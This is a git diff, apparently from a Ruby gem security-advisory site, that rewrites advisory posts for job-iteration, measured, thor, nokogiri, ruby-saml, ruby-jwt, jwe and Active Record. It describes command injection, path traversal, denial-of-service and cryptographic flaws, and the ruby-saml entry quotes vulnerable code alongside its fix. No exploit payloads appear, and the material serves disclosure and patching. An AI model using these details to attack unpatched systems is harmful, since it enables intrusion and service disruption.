+  url: https://github.com/Shopify/job-iteration/security/advisories/GHSA-6qjf-g333-pv38
+  title: Job Iteration API is vulnerable to OS Command Injection attack through its
+    CsvEnumerator class
+  date: 2025-07-14
+  description: |
+    ### Impact
+
+    There is an arbitrary code execution vulnerability in the
+    `CsvEnumerator` class of the `job-iteration` repository. This
+    vulnerability can be exploited by an attacker to execute arbitrary
+    commands on the system where the application is running, potentially
+    leading to unauthorized access, data leakage, or complete system
+    compromise.
+
+    ### Patches
+
+    Issue is fixed in versions `1.11.0` and above.
+
+    ### Workarounds
+
+    Users can mitigate the risk by avoiding the use of untrusted input
+    in the `CsvEnumerator` class and ensuring that any file paths are
+    properly sanitized and validated before being passed to the class
+    methods. Users should avoid calling `size` on enumerators
+    constructed with untrusted CSV filenames.
+  cvss_v4: 8.1
+  patched_versions:
+  - ">= 1.11"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-53623
+    - https://github.com/Shopify/job-iteration/security/advisories/GHSA-6qjf-g333-pv38
+    - https://github.com/Shopify/job-iteration/pull/595
+    - https://github.com/Shopify/job-iteration/commit/1a7adfdd041105a5e45e774cadc6b973a292ba55
+    - https://github.com/Shopify/job-iteration/releases/tag/v1.11.0
+    - https://github.com/advisories/GHSA-6qjf-g333-pv38
+---
diff --git a/advisories/_posts/2025-07-15-GHSA-29g5-m8v7-v564.md b/advisories/_posts/2025-07-15-GHSA-29g5-m8v7-v564.md
index 2c03100f..64c64e87 100644
--- a/advisories/_posts/2025-07-15-GHSA-29g5-m8v7-v564.md
+++ b/advisories/_posts/2025-07-15-GHSA-29g5-m8v7-v564.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'GHSA-29g5-m8v7-v564 (measured): Measured is vulnerable to Path Traversal attacks
-  during class initialization'
-comments: false
-categories:
-- measured
-advisory:
-  gem: measured
-  ghsa: 29g5-m8v7-v564
-  url: https://github.com/Shopify/measured/security/advisories/GHSA-29g5-m8v7-v564
-  title: Measured is vulnerable to Path Traversal attacks during class initialization
-  date: 2025-07-15
-  description: |
-    ### Impact
-
-    A path traversal vulnerability exists where an attacker
-    with access to manipulate inputs when initializing the
-    `Measured::Cache::Json class` would be able to instruct
-    the library to read arbitrary files.
-
-    ### Patches
-
-    Users should update to the latest version.
-  patched_versions:
-  - ">= 3.2.1"
-  related:
-    url:
-    - https://github.com/Shopify/measured/security/advisories/GHSA-29g5-m8v7-v564
-    - https://github.com/Shopify/measured/commit/d6319985a2304d97c085e3dc45c98af554f4be76
-    - https://github.com/advisories/GHSA-29g5-m8v7-v564
----
+---
+layout: advisory
+title: 'GHSA-29g5-m8v7-v564 (measured): Measured is vulnerable to Path Traversal attacks
+  during class initialization'
+comments: false
+categories:
+- measured
+advisory:
+  gem: measured
+  ghsa: 29g5-m8v7-v564
+  url: https://github.com/Shopify/measured/security/advisories/GHSA-29g5-m8v7-v564
+  title: Measured is vulnerable to Path Traversal attacks during class initialization
+  date: 2025-07-15
+  description: |
+    ### Impact
+
+    A path traversal vulnerability exists where an attacker
+    with access to manipulate inputs when initializing the
+    `Measured::Cache::Json class` would be able to instruct
+    the library to read arbitrary files.
+
+    ### Patches
+
+    Users should update to the latest version.
+  patched_versions:
+  - ">= 3.2.1"
+  related:
+    url:
+    - https://github.com/Shopify/measured/security/advisories/GHSA-29g5-m8v7-v564
+    - https://github.com/Shopify/measured/commit/d6319985a2304d97c085e3dc45c98af554f4be76
+    - https://github.com/advisories/GHSA-29g5-m8v7-v564
+---
diff --git a/advisories/_posts/2025-07-20-CVE-2025-54314.md b/advisories/_posts/2025-07-20-CVE-2025-54314.md
index 61bbb1b7..5a883e4c 100644
--- a/advisories/_posts/2025-07-20-CVE-2025-54314.md
+++ b/advisories/_posts/2025-07-20-CVE-2025-54314.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2025-54314 (thor): Thor can construct an unsafe shell command from library
-  input.'
-comments: false
-categories:
-- thor
-advisory:
-  gem: thor
-  cve: 2025-54314
-  ghsa: mqcp-p2hv-vw6x
-  url: https://github.com/advisories/GHSA-mqcp-p2hv-vw6x
-  title: Thor can construct an unsafe shell command from library input.
-  date: 2025-07-20
-  description: |
-    Thor before 1.4.0 can construct an unsafe shell command
-    from library input.
-  cvss_v3: 2.8
-  patched_versions:
-  - ">= 1.4.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-54314
-    - https://github.com/rails/thor/releases/tag/v1.4.0
-    - https://github.com/rails/thor/pull/897
-    - https://github.com/rails/thor/commit/536b79036a0efb765c1899233412e7b1ca94abfa
-    - https://hackerone.com/reports/3260153
-    - https://github.com/advisories/GHSA-mqcp-p2hv-vw6x
----
+---
+layout: advisory
+title: 'CVE-2025-54314 (thor): Thor can construct an unsafe shell command from library
+  input.'
+comments: false
+categories:
+- thor
+advisory:
+  gem: thor
+  cve: 2025-54314
+  ghsa: mqcp-p2hv-vw6x
+  url: https://github.com/advisories/GHSA-mqcp-p2hv-vw6x
+  title: Thor can construct an unsafe shell command from library input.
+  date: 2025-07-20
+  description: |
+    Thor before 1.4.0 can construct an unsafe shell command
+    from library input.
+  cvss_v3: 2.8
+  patched_versions:
+  - ">= 1.4.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-54314
+    - https://github.com/rails/thor/releases/tag/v1.4.0
+    - https://github.com/rails/thor/pull/897
+    - https://github.com/rails/thor/commit/536b79036a0efb765c1899233412e7b1ca94abfa
+    - https://hackerone.com/reports/3260153
+    - https://github.com/advisories/GHSA-mqcp-p2hv-vw6x
+---
diff --git a/advisories/_posts/2025-07-21-GHSA-353f-x4gh-cqq8.md b/advisories/_posts/2025-07-21-GHSA-353f-x4gh-cqq8.md
index 02839645..616af9cc 100644
--- a/advisories/_posts/2025-07-21-GHSA-353f-x4gh-cqq8.md
+++ b/advisories/_posts/2025-07-21-GHSA-353f-x4gh-cqq8.md
@@ -1,114 +1,114 @@
----
-layout: advisory
-title: 'GHSA-353f-x4gh-cqq8 (nokogiri): Nokogiri patches vendored libxml2 to resolve
-  multiple CVEs'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  ghsa: 353f-x4gh-cqq8
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-353f-x4gh-cqq8
-  title: Nokogiri patches vendored libxml2 to resolve multiple CVEs
-  date: 2025-07-21
-  description: |
-    ## Summary
-
-    Nokogiri v1.18.9 patches the vendored libxml2 to address
-    CVE-2025-6021, CVE-2025-6170, CVE-2025-49794, CVE-2025-49795,
-    and CVE-2025-49796.
-
-    ## Impact and severity
-
-    ### CVE-2025-6021
-
-    A flaw was found in libxml2's xmlBuildQName function, where integer
-    overflows in buffer size calculations can lead to a stack-based
-    buffer overflow. This issue can result in memory corruption or a
-    denial of service when processing crafted input.
-
-    NVD claims a severity of 7.5 High
-    (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
-
-    Fixed by applying https://gitlab.gnome.org/GNOME/libxml2/-/commit/17d950ae
-
-    ### CVE-2025-6170
-
-    A flaw was found in the interactive shell of the xmllint command-line
-    tool, used for parsing XML files. When a user inputs an overly long
-    command, the program does not check the input size properly, which
-    can cause it to crash. This issue might allow attackers to run
-    harmful code in rare configurations without modern protections.
-
-    NVD claims a severity of 2.5 Low
-    (CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L)
-
-    Fixed by applying https://gitlab.gnome.org/GNOME/libxml2/-/commit/5e9ec5c1
-
-    ### CVE-2025-49794
-
-    A use-after-free vulnerability was found in libxml2. This issue
-    occurs when parsing XPath elements under certain circumstances when
-    the XML schematron has the <sch:name path="..."/> schema elements.
-    This flaw allows a malicious actor to craft a malicious XML document
-    used as input for libxml, resulting in the program's crash using
-    libxml or other possible undefined behaviors.
-
-    NVD claims a severity of 9.1 Critical
-    (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)
-
-    Fixed by applying https://gitlab.gnome.org/GNOME/libxml2/-/commit/81cef8c5
-
-    ### CVE-2025-49795
-
-    A NULL pointer dereference vulnerability was found in libxml2 when
-    processing XPath XML expressions. This flaw allows an attacker to
-    craft a malicious XML input to libxml2, leading to a denial of service.
-
-    NVD claims a severity of 7.5 High
-    (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
-
-    Fixed by applying https://gitlab.gnome.org/GNOME/libxml2/-/commit/62048278
-
-    ### CVE-2025-49796
-
-    A vulnerability was found in libxml2. Processing certain sch:name
-    elements from the input XML file can trigger a memory corruption
-    issue. This flaw allows an attacker to craft a malicious XML input
-    file that can lead libxml to crash, resulting in a denial of service
-    or other possible undefined behavior due to sensitive data being
-    corrupted in memory.
-
-    NVD claims a severity of 9.1 Critical
-    (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)
-
-    Fixed by applying https://gitlab.gnome.org/GNOME/libxml2/-/commit/81cef8c5
-
-    ## Affected Versions
-
-    - Nokogiri < 1.18.9 when using CRuby (MRI) with vendored libxml2
-
-    ## Patched Versions
-
-    - Nokogiri >= 1.18.9
-
-    ## Mitigation
-
-    Upgrade to Nokogiri v1.18.9 or later.
-
-    Users who are unable to upgrade Nokogiri may also choose a more
-    complicated mitigation: compile and link Nokogiri against patched
-    external libxml2 libraries which will also address these same issues.
-  patched_versions:
-  - ">= 1.18.9"
-  related:
-    url:
-    - https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-353f-x4gh-cqq8
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-49794
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-49795
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-49796
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-6021
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-6170
-    - https://github.com/sparklemotion/nokogiri/pull/3526
-    - https://github.com/advisories/GHSA-353f-x4gh-cqq8
----
+---
+layout: advisory
+title: 'GHSA-353f-x4gh-cqq8 (nokogiri): Nokogiri patches vendored libxml2 to resolve
+  multiple CVEs'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  ghsa: 353f-x4gh-cqq8
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-353f-x4gh-cqq8
+  title: Nokogiri patches vendored libxml2 to resolve multiple CVEs
+  date: 2025-07-21
+  description: |
+    ## Summary
+
+    Nokogiri v1.18.9 patches the vendored libxml2 to address
+    CVE-2025-6021, CVE-2025-6170, CVE-2025-49794, CVE-2025-49795,
+    and CVE-2025-49796.
+
+    ## Impact and severity
+
+    ### CVE-2025-6021
+
+    A flaw was found in libxml2's xmlBuildQName function, where integer
+    overflows in buffer size calculations can lead to a stack-based
+    buffer overflow. This issue can result in memory corruption or a
+    denial of service when processing crafted input.
+
+    NVD claims a severity of 7.5 High
+    (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
+
+    Fixed by applying https://gitlab.gnome.org/GNOME/libxml2/-/commit/17d950ae
+
+    ### CVE-2025-6170
+
+    A flaw was found in the interactive shell of the xmllint command-line
+    tool, used for parsing XML files. When a user inputs an overly long
+    command, the program does not check the input size properly, which
+    can cause it to crash. This issue might allow attackers to run
+    harmful code in rare configurations without modern protections.
+
+    NVD claims a severity of 2.5 Low
+    (CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L)
+
+    Fixed by applying https://gitlab.gnome.org/GNOME/libxml2/-/commit/5e9ec5c1
+
+    ### CVE-2025-49794
+
+    A use-after-free vulnerability was found in libxml2. This issue
+    occurs when parsing XPath elements under certain circumstances when
+    the XML schematron has the <sch:name path="..."/> schema elements.
+    This flaw allows a malicious actor to craft a malicious XML document
+    used as input for libxml, resulting in the program's crash using
+    libxml or other possible undefined behaviors.
+
+    NVD claims a severity of 9.1 Critical
+    (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)
+
+    Fixed by applying https://gitlab.gnome.org/GNOME/libxml2/-/commit/81cef8c5
+
+    ### CVE-2025-49795
+
+    A NULL pointer dereference vulnerability was found in libxml2 when
+    processing XPath XML expressions. This flaw allows an attacker to
+    craft a malicious XML input to libxml2, leading to a denial of service.
+
+    NVD claims a severity of 7.5 High
+    (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
+
+    Fixed by applying https://gitlab.gnome.org/GNOME/libxml2/-/commit/62048278
+
+    ### CVE-2025-49796
+
+    A vulnerability was found in libxml2. Processing certain sch:name
+    elements from the input XML file can trigger a memory corruption
+    issue. This flaw allows an attacker to craft a malicious XML input
+    file that can lead libxml to crash, resulting in a denial of service
+    or other possible undefined behavior due to sensitive data being
+    corrupted in memory.
+
+    NVD claims a severity of 9.1 Critical
+    (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)
+
+    Fixed by applying https://gitlab.gnome.org/GNOME/libxml2/-/commit/81cef8c5
+
+    ## Affected Versions
+
+    - Nokogiri < 1.18.9 when using CRuby (MRI) with vendored libxml2
+
+    ## Patched Versions
+
+    - Nokogiri >= 1.18.9
+
+    ## Mitigation
+
+    Upgrade to Nokogiri v1.18.9 or later.
+
+    Users who are unable to upgrade Nokogiri may also choose a more
+    complicated mitigation: compile and link Nokogiri against patched
+    external libxml2 libraries which will also address these same issues.
+  patched_versions:
+  - ">= 1.18.9"
+  related:
+    url:
+    - https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-353f-x4gh-cqq8
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-49794
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-49795
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-49796
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-6021
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-6170
+    - https://github.com/sparklemotion/nokogiri/pull/3526
+    - https://github.com/advisories/GHSA-353f-x4gh-cqq8
+---
diff --git a/advisories/_posts/2025-07-30-CVE-2025-54572.md b/advisories/_posts/2025-07-30-CVE-2025-54572.md
index 99a559b8..6a43cf69 100644
--- a/advisories/_posts/2025-07-30-CVE-2025-54572.md
+++ b/advisories/_posts/2025-07-30-CVE-2025-54572.md
@@ -1,96 +1,96 @@
----
-layout: advisory
-title: 'CVE-2025-54572 (ruby-saml): Ruby SAML DOS vulnerability with large SAML response'
-comments: false
-categories:
-- ruby-saml
-advisory:
-  gem: ruby-saml
-  cve: 2025-54572
-  ghsa: rrqh-93c8-j966
-  url: https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-rrqh-93c8-j966
-  title: Ruby SAML DOS vulnerability with large SAML response
-  date: 2025-07-30
-  description: |
-    ### Summary
-
-    A denial-of-service vulnerability exists in ruby-saml even with the
-    message_max_bytesize setting configured. The vulnerability occurs
-    because the SAML response is validated for Base64 format prior to
-    checking the message size,  leading to potential resource exhaustion.
-
-    ### Details
-
-    `ruby-saml` includes a `message_max_bytesize` setting intended to
-    prevent DOS attacks and decompression bombs. However, this protection
-    is ineffective in some cases due to the order of operations in the code:
-
-    https://github.com/SAML-Toolkits/ruby-saml/blob/fbbedc978300deb9355a8e505849666974ef2e67/lib/onelogin/ruby-saml/saml_message.rb
-
-    ```ruby
-         def decode_raw_saml(saml, settings = nil)
-            return saml unless base64_encoded?(saml)
-    # <--- Issue here. Should be moved after next code block.
-
-            settings =  OneLogin::RubySaml::Settings.new if settings.nil?
-            if saml.bytesize > settings.message_max_bytesize
-               raise ValidationError.new(\"Encoded SAML Message exceeds \" +
-               settings.message_max_bytesize.to_s +
-               \" bytes, so was rejected\")
-            end
-            decoded = decode(saml)
-          ...
-          end
-    ```
-
-    The vulnerability is in the execution order. Prior to checking
-    bytesize the `base64_encoded?` function performs regex matching
-    on the entire input string:
-
-    ```ruby
-    !!string.gsub(/[\\r\]|\\\\r|\\\|\\s/, \"\").match(BASE64_FORMAT)
-    ```
-
-    ### Impact
-
-    _What kind of vulnerability is it? Who is impacted?_
-
-    When successfully  exploited, this vulnerability can lead to:
-    - Excessive memory consumption
-    - High CPU utilization
-    - Application slowdown or unresponsiveness
-    - Complete application crash in severe cases
-    - Potential denial of service for legitimate users
-
-    All applications using `ruby-saml` with SAML configured and
-    enabled are vulnerable.
-
-    ###   Potential Solution
-
-    Reorder the validation steps to ensure max bytesize is checked first
-
-    ```ruby
-    def decode_raw_saml(saml, settings = nil)
-      settings = OneLogin::RubySaml::Settings.new
-    if settings.nil?
-      if saml.bytesize > settings.message_max_bytesize
-        raise  ValidationError.new(\"Encoded SAML Message exceeds \" +
-        settings.message_max_bytesize.to_s  + \" bytes, so was rejected\")
-      end
-      return saml unless base64_encoded?(saml)
-      decoded = decode(saml)
-      ...
-    end
-    ```
-  cvss_v4: 6.9
-  patched_versions:
-  - ">= 1.18.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-54572
-    - https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-rrqh-93c8-j966
-    - https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.18.1
-    - https://github.com/SAML-Toolkits/ruby-saml/pull/770
-    - https://github.com/SAML-Toolkits/ruby-saml/commit/38ef5dd1ce17514e202431f569c4f5633e6c2709
-    - https://github.com/advisories/GHSA-rrqh-93c8-j966
----
+---
+layout: advisory
+title: 'CVE-2025-54572 (ruby-saml): Ruby SAML DOS vulnerability with large SAML response'
+comments: false
+categories:
+- ruby-saml
+advisory:
+  gem: ruby-saml
+  cve: 2025-54572
+  ghsa: rrqh-93c8-j966
+  url: https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-rrqh-93c8-j966
+  title: Ruby SAML DOS vulnerability with large SAML response
+  date: 2025-07-30
+  description: |
+    ### Summary
+
+    A denial-of-service vulnerability exists in ruby-saml even with the
+    message_max_bytesize setting configured. The vulnerability occurs
+    because the SAML response is validated for Base64 format prior to
+    checking the message size,  leading to potential resource exhaustion.
+
+    ### Details
+
+    `ruby-saml` includes a `message_max_bytesize` setting intended to
+    prevent DOS attacks and decompression bombs. However, this protection
+    is ineffective in some cases due to the order of operations in the code:
+
+    https://github.com/SAML-Toolkits/ruby-saml/blob/fbbedc978300deb9355a8e505849666974ef2e67/lib/onelogin/ruby-saml/saml_message.rb
+
+    ```ruby
+         def decode_raw_saml(saml, settings = nil)
+            return saml unless base64_encoded?(saml)
+    # <--- Issue here. Should be moved after next code block.
+
+            settings =  OneLogin::RubySaml::Settings.new if settings.nil?
+            if saml.bytesize > settings.message_max_bytesize
+               raise ValidationError.new(\"Encoded SAML Message exceeds \" +
+               settings.message_max_bytesize.to_s +
+               \" bytes, so was rejected\")
+            end
+            decoded = decode(saml)
+          ...
+          end
+    ```
+
+    The vulnerability is in the execution order. Prior to checking
+    bytesize the `base64_encoded?` function performs regex matching
+    on the entire input string:
+
+    ```ruby
+    !!string.gsub(/[\\r\]|\\\\r|\\\|\\s/, \"\").match(BASE64_FORMAT)
+    ```
+
+    ### Impact
+
+    _What kind of vulnerability is it? Who is impacted?_
+
+    When successfully  exploited, this vulnerability can lead to:
+    - Excessive memory consumption
+    - High CPU utilization
+    - Application slowdown or unresponsiveness
+    - Complete application crash in severe cases
+    - Potential denial of service for legitimate users
+
+    All applications using `ruby-saml` with SAML configured and
+    enabled are vulnerable.
+
+    ###   Potential Solution
+
+    Reorder the validation steps to ensure max bytesize is checked first
+
+    ```ruby
+    def decode_raw_saml(saml, settings = nil)
+      settings = OneLogin::RubySaml::Settings.new
+    if settings.nil?
+      if saml.bytesize > settings.message_max_bytesize
+        raise  ValidationError.new(\"Encoded SAML Message exceeds \" +
+        settings.message_max_bytesize.to_s  + \" bytes, so was rejected\")
+      end
+      return saml unless base64_encoded?(saml)
+      decoded = decode(saml)
+      ...
+    end
+    ```
+  cvss_v4: 6.9
+  patched_versions:
+  - ">= 1.18.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-54572
+    - https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-rrqh-93c8-j966
+    - https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.18.1
+    - https://github.com/SAML-Toolkits/ruby-saml/pull/770
+    - https://github.com/SAML-Toolkits/ruby-saml/commit/38ef5dd1ce17514e202431f569c4f5633e6c2709
+    - https://github.com/advisories/GHSA-rrqh-93c8-j966
+---
diff --git a/advisories/_posts/2025-08-07-CVE-2025-45765.md b/advisories/_posts/2025-08-07-CVE-2025-45765.md
index 2447b65b..fcafabd6 100644
--- a/advisories/_posts/2025-08-07-CVE-2025-45765.md
+++ b/advisories/_posts/2025-08-07-CVE-2025-45765.md
@@ -1,41 +1,41 @@
----
-layout: advisory
-title: 'CVE-2025-45765 (ruby-jwt): ruby-jwt < v3.0.0.beta1 was discovered to contain
-  weak encryption'
-comments: false
-categories:
-- ruby-jwt
-advisory:
-  gem: ruby-jwt
-  cve: 2025-45765
-  ghsa: 6ch4-944p-wf7j
-  url: https://github.com/advisories/GHSA-6ch4-944p-wf7j
-  title: ruby-jwt < v3.0.0.beta1 was discovered to contain weak encryption
-  date: 2025-08-07
-  description: |
-    ruby-jwt < v3.0.0.beta1 was discovered to contain weak encryption.
-
-    NOTE: the Supplier's perspective is "keysize is not something
-    that is enforced by this library. Currently more recent versions
-    of OpenSSL are enforcing some key sizes and those restrictions
-    apply to the users of this gem also."
-
-    ## BACKGROUND
-
-    We found that the HMAC and RSA key lengths used in your JSON Web
-    Signature (JWS) implementation do not meet recommended security
-    standards (RFC 75180NIST SP800-1170RFC 2437).
-
-    According to CWE-326 (Inadequate Encryption Strength), using keys
-    that are too short can lead to serious vulnerabilities and
-    potential attacks.
-  cvss_v3: 9.1
-  patched_versions:
-  - ">= 3.0.0.beta1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-45765
-    - https://github.com/advisories/GHSA-6ch4-944p-wf7j
-    - https://github.com/jwt/ruby-jwt/issues/668
-    - https://gist.github.com/ZupeiNie/c621253068ce5b64911629534879e8f9
----
+---
+layout: advisory
+title: 'CVE-2025-45765 (ruby-jwt): ruby-jwt < v3.0.0.beta1 was discovered to contain
+  weak encryption'
+comments: false
+categories:
+- ruby-jwt
+advisory:
+  gem: ruby-jwt
+  cve: 2025-45765
+  ghsa: 6ch4-944p-wf7j
+  url: https://github.com/advisories/GHSA-6ch4-944p-wf7j
+  title: ruby-jwt < v3.0.0.beta1 was discovered to contain weak encryption
+  date: 2025-08-07
+  description: |
+    ruby-jwt < v3.0.0.beta1 was discovered to contain weak encryption.
+
+    NOTE: the Supplier's perspective is "keysize is not something
+    that is enforced by this library. Currently more recent versions
+    of OpenSSL are enforcing some key sizes and those restrictions
+    apply to the users of this gem also."
+
+    ## BACKGROUND
+
+    We found that the HMAC and RSA key lengths used in your JSON Web
+    Signature (JWS) implementation do not meet recommended security
+    standards (RFC 75180NIST SP800-1170RFC 2437).
+
+    According to CWE-326 (Inadequate Encryption Strength), using keys
+    that are too short can lead to serious vulnerabilities and
+    potential attacks.
+  cvss_v3: 9.1
+  patched_versions:
+  - ">= 3.0.0.beta1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-45765
+    - https://github.com/advisories/GHSA-6ch4-944p-wf7j
+    - https://github.com/jwt/ruby-jwt/issues/668
+    - https://gist.github.com/ZupeiNie/c621253068ce5b64911629534879e8f9
+---
diff --git a/advisories/_posts/2025-08-07-CVE-2025-54887.md b/advisories/_posts/2025-08-07-CVE-2025-54887.md
index a3e43213..d54bd4cf 100644
--- a/advisories/_posts/2025-08-07-CVE-2025-54887.md
+++ b/advisories/_posts/2025-08-07-CVE-2025-54887.md
@@ -1,54 +1,54 @@
----
-layout: advisory
-title: 'CVE-2025-54887 (jwe): JWE is missing AES-GCM authentication tag validation
-  in encrypted JWE'
-comments: false
-categories:
-- jwe
-advisory:
-  gem: jwe
-  cve: 2025-54887
-  ghsa: c7p4-hx26-pr73
-  url: https://github.com/jwt/ruby-jwe/security/advisories/GHSA-c7p4-hx26-pr73
-  title: JWE is missing AES-GCM authentication tag validation in encrypted JWE
-  date: 2025-08-07
-  description: |
-    ### Overview
-
-    The authentication tag of encrypted JWEs can be brute forced,
-    which may result in loss of confidentiality for those JWEs and
-    provide ways to craft arbitrary JWEs.
-
-    ### Impact
-
-    - JWEs can be modified to decrypt to an arbitrary value
-    - JWEs can be decrypted by observing parsing differences
-    - The GCM internal
-      [GHASH key](https://en.wikipedia.org/wiki/Galois/Counter_Mode)
-      can be recovered
-
-    ### Am I Affected?
-
-    You are affected by this vulnerability even if you do not
-    use an `AES-GCM` encryption algorithm for your JWEs.
-
-    ### Patches
-
-    The version 1.1.1 fixes the issue by adding the tag length check for the `AES-GCM` algorithm.
-
-    **Important:** As the [GHASH key](https://en.wikipedia.org/wiki/Galois/Counter_Mode)
-    could have leaked, you must rotate the encryption keys after
-    upgrading to version 1.1.1.
-
-    ### References
-
-    [Félix Charette talk at NorthSec 2025 about the issue](https://www.youtube.com/watch?v=9IT659uUXfs&t=15830s)
-  cvss_v3: 9.1
-  patched_versions:
-  - ">= 1.1.1"
-  related:
-    url:
-    - https://github.com/jwt/ruby-jwe/security/advisories/GHSA-c7p4-hx26-pr73
-    - https://github.com/jwt/ruby-jwe/releases/tag/v1.1.1
-    - https://github.com/advisories/GHSA-c7p4-hx26-pr73
----
+---
+layout: advisory
+title: 'CVE-2025-54887 (jwe): JWE is missing AES-GCM authentication tag validation
+  in encrypted JWE'
+comments: false
+categories:
+- jwe
+advisory:
+  gem: jwe
+  cve: 2025-54887
+  ghsa: c7p4-hx26-pr73
+  url: https://github.com/jwt/ruby-jwe/security/advisories/GHSA-c7p4-hx26-pr73
+  title: JWE is missing AES-GCM authentication tag validation in encrypted JWE
+  date: 2025-08-07
+  description: |
+    ### Overview
+
+    The authentication tag of encrypted JWEs can be brute forced,
+    which may result in loss of confidentiality for those JWEs and
+    provide ways to craft arbitrary JWEs.
+
+    ### Impact
+
+    - JWEs can be modified to decrypt to an arbitrary value
+    - JWEs can be decrypted by observing parsing differences
+    - The GCM internal
+      [GHASH key](https://en.wikipedia.org/wiki/Galois/Counter_Mode)
+      can be recovered
+
+    ### Am I Affected?
+
+    You are affected by this vulnerability even if you do not
+    use an `AES-GCM` encryption algorithm for your JWEs.
+
+    ### Patches
+
+    The version 1.1.1 fixes the issue by adding the tag length check for the `AES-GCM` algorithm.
+
+    **Important:** As the [GHASH key](https://en.wikipedia.org/wiki/Galois/Counter_Mode)
+    could have leaked, you must rotate the encryption keys after
+    upgrading to version 1.1.1.
+
+    ### References
+
+    [Félix Charette talk at NorthSec 2025 about the issue](https://www.youtube.com/watch?v=9IT659uUXfs&t=15830s)
+  cvss_v3: 9.1
+  patched_versions:
+  - ">= 1.1.1"
+  related:
+    url:
+    - https://github.com/jwt/ruby-jwe/security/advisories/GHSA-c7p4-hx26-pr73
+    - https://github.com/jwt/ruby-jwe/releases/tag/v1.1.1
+    - https://github.com/advisories/GHSA-c7p4-hx26-pr73
+---
diff --git a/advisories/_posts/2025-08-13-CVE-2025-55193.md b/advisories/_posts/2025-08-13-CVE-2025-55193.md
index 196b4635..0087b4a6 100644
--- a/advisories/_posts/2025-08-13-CVE-2025-55193.md
+++ b/advisories/_posts/2025-08-13-CVE-2025-55193.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'CVE-2025-55193 (activerecord): Active Record logging vulnerable to ANSI escape
-  injection'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2025-55193
-  ghsa: 76r7-hhxj-r776
-  url: https://github.com/rails/rails/security/advisories/GHSA-76r7-hhxj-r776
-  title: Active Record logging vulnerable to ANSI escape injection
-  date: 2025-08-13
-  description: |
-    This vulnerability has been assigned the CVE identifier CVE-2025-55193
-
-    ### Impact
-
-    The ID passed to `find` or similar methods may be logged without
-    escaping. If this is directly to the terminal, it may include
-    unescaped ANSI sequences.
-
-    ### Releases
-
-    The fixed releases are available at the normal locations.
-
-    ### Credits
-
-    Thanks to [lio346](https://hackerone.com/lio346) for reporting
-    this vulnerability.
-  patched_versions:
-  - "~> 7.1.5, >= 7.1.5.2"
-  - "~> 7.2.2, >= 7.2.2.2"
-  - ">= 8.0.2.1"
-  related:
-    url:
-    - https://github.com/rails/rails/security/advisories/GHSA-76r7-hhxj-r776
-    - https://github.com/rails/rails/commit/3beef20013736fd52c5dcfdf061f7999ba318290
-    - https://github.com/rails/rails/commit/568c0bc2f1e74c65d150a84b89a080949bf9eb9b
-    - https://github.com/rails/rails/commit/6a944ca4805e72050a0fbb1a461534eb760d3202
-    - https://cert.kenet.or.ke/cve-2025-55193-ruby-rails-ansi-sequence-injection-vulnerability
-    - https://github.com/advisories/GHSA-76r7-hhxj-r776
----
+---
+layout: advisory
+title: 'CVE-2025-55193 (activerecord): Active Record logging vulnerable to ANSI escape
+  injection'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2025-55193
+  ghsa: 76r7-hhxj-r776
+  url: https://github.com/rails/rails/security/advisories/GHSA-76r7-hhxj-r776
+  title: Active Record logging vulnerable to ANSI escape injection
+  date: 2025-08-13
+  description: |
+    This vulnerability has been assigned the CVE identifier CVE-2025-55193
+
+    ### Impact
+
+    The ID passed to `find` or similar methods may be logged without
+    escaping. If this is directly to the terminal, it may include
+    unescaped ANSI sequences.
+
+    ### Releases
+
+    The fixed releases are available at the normal locations.
+
+    ### Credits
+
+    Thanks to [lio346](https://hackerone.com/lio346) for reporting
